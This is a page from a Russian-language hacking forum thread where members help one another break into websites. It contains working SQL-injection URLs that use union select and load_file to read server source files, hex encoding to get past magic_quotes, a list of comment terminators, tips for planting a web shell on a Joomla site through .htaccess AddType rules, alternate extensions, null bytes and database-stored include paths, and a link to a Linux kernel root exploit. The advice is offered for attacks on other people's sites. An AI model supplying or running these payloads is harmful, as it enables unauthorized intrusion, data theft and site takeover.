Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
Page 641 of 1207
  1. Rabben

    Rabben New Member

    Joined:
    27 Mar 2009
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    http://test.ru/browse_classifieds.php?s=classified_date%20DESC&v=0&classifiedcat_id=-1+union+select+load_file('/var/www/test/htdocs/browse_classifieds.php'),2,3%20/*

    Подправьте пожалуйста запрос для скачки /var/www/test/htdocs/browse_classifieds.php
    данного файла
     
    #12801 Rabben, 9 May 2010
  2. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Thanks!
     
    #12802 FlaktW, 9 May 2010
  3. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    вы имеете в виду magic_quotes_gpc=on
    тогда
    http://test.ru/browse_classifieds.php?s=classified_date%20DESC&v=0&classifiedcat_id=-1+union+select+load_file(0x2f7661722f7777772f746573742f6874646f63732f62726f7773655f636c6173736966696564732e706870),2,3%20/*
     
    #12803 pinch, 9 May 2010
  4. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    есть сервер Linux 2.6.18-028stab057.4 #1 SMP Fri Aug 1 10:47:59 MSD 2008 i686 GNU/Linux
    при запуске эксплойта http://milw0rm.com/sploits/2009-linux-sendpage3.tar.gz пишется ошибка:
    ядро пропатчено?!
     
    #12804 daniel_1024, 9 May 2010
  5. Rabben

    Rabben New Member

    Joined:
    27 Mar 2009
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    мм, можно поподробней причем magic_quotes и почему меняются буквы на код?
     
    #12805 Rabben, 9 May 2010
  6. karencho777

    karencho777 New Member

    Joined:
    20 Jan 2010
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    не забывайте про меня пожалуйсто
     
    #12806 karencho777, 9 May 2010
  7. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    magic_quotes экранирует спецсимволы (',",null,/), в данном случае одиночные кавычки, чтобы читать файлы конструкцией load_file необходимо их наличие, для обхода экранизации используеться Sql Hex
     
    #12807 h00lyshit!, 9 May 2010
    Last edited: 11 May 2010
  8. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    http://ru.php.net/get_magic_quotes_gpc


    /var/www/test/htdocs/browse_classifieds.php
    =>
    0x2f7661722f7777772f746573742f6874646f63732f62726f7773655f636c6173736966696564732e706870
    =>
    union+select+load_file(0x2f7661722f7777772f746573742f6874646f63732f62726f7773655f636c6173736966696564732e706870)

    при соответствующих правах
     
    #12808 .:[melkiy]:., 9 May 2010
  9. Анжелика

    Анжелика Elder - Старейшина

    Joined:
    25 Mar 2008
    Messages:
    25
    Likes Received:
    36
    Reputations:
    -4
    кавычки не обязательны
    это не фильтрация
    это не кодировка
     
    #12809 Анжелика, 9 May 2010
    5 people like this.
  10. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,258
    Reputations:
    274
    Добрый вечер всем.cms джумла, папка на запись только images, joomla_xplorer не установить как и другой модуль, шаблоны не правятся, в пaпке с картинками залитый шелл выдается иcxодным кодом.... как залить шелл?
     
    #12810 Gorev, 9 May 2010
  11. nikp

    nikp Banned

    Joined:
    19 Sep 2008
    Messages:
    328
    Likes Received:
    591
    Reputations:
    764
    - пробовать расширения .phtml, .php3 и т.д.
    - мешает .htaccess, определить какой, если в images удалить, если в корне, в images залить свой, в нем разрешить выполнение с нужным расширеним, по типу
    AddType application/x-httpd-php .php .phtml .jpg
     
    #12811 nikp, 9 May 2010
  12. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,258
    Reputations:
    274
    php3,php5,phtml,shtml,html,htm не канают...был бы доступ к .htaccess , вопросов бы небыло
     
    #12812 Gorev, 9 May 2010
  13. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Языки тоже не правятся? Хотя скорее всего да, иначе ты бы не написал бы пост...

    В джамуле некоторые пути до пхп файлов (которые инклудятся двигом), а точнее до дир лежат в бд. И возможно тебе удастся проинклудить шелл, который сам по себе не выполняется. Запросы к бд выполняй через восстановление БД (запихиваешь нужный запрос в файл, к примеру 1.sql). В путях, скорее всего, имени пхп файла не будет и скорее всего везде будет инклудиться index.php, но тут должен помочь %00 (mq = on не помешает, т.к. запрос будет лежать в загружаемом файле).

    Посмотри вот это: https://forum.antichat.ru/showpost.php?p=697864&postcount=10 (там нечто похожее описывалось)
    + скачай двиг и потестируй все на локалке, иначе все убьешь в мгновение, да и после успешного выполнения двиг нормально работать не будет - нужно будет быстро перезалить шелл и все вернуть на место.
     
    #12813 Grey, 10 May 2010
    Last edited: 10 May 2010
    2 people like this.
  14. apolon47

    apolon47 Banned

    Joined:
    13 Apr 2009
    Messages:
    119
    Likes Received:
    14
    Reputations:
    4
    как правильно составить запрос?
    SELECT * FROM mobiticket.structure_page WHERE tag = '53' AND status = 'active'

    пробую так
    page.php?page=53'+union+select+1,2,3,4,5,6,7,8,9,'10

    пишет
     
    #12814 apolon47, 10 May 2010
  15. Napas

    Napas Member

    Joined:
    30 Nov 2008
    Messages:
    41
    Likes Received:
    12
    Reputations:
    7
    53'+union+select+1,2,3,4,5,6,7,8,9,10--+
     
    #12815 Napas, 10 May 2010
    1 person likes this.
  16. apolon47

    apolon47 Banned

    Joined:
    13 Apr 2009
    Messages:
    119
    Likes Received:
    14
    Reputations:
    4
    все равно пишет Unknown column 'status' in 'field list'
     
    #12816 apolon47, 10 May 2010
  17. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    Попробуй /* вместо --+
     
    #12817 wildshaman, 10 May 2010
  18. apolon47

    apolon47 Banned

    Joined:
    13 Apr 2009
    Messages:
    119
    Likes Received:
    14
    Reputations:
    4
    ошибка
     
    #12818 apolon47, 10 May 2010
    Last edited: 10 May 2010
  19. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,518
    Likes Received:
    401
    Reputations:
    196
    нуллбайт попробуй :D
     
    #12819 попугай, 10 May 2010
  20. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    --
    /*
    %23
    {
     
    #12820 pinch, 10 May 2010
(You must log in or sign up to post here.)
Page 641 of 1207
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.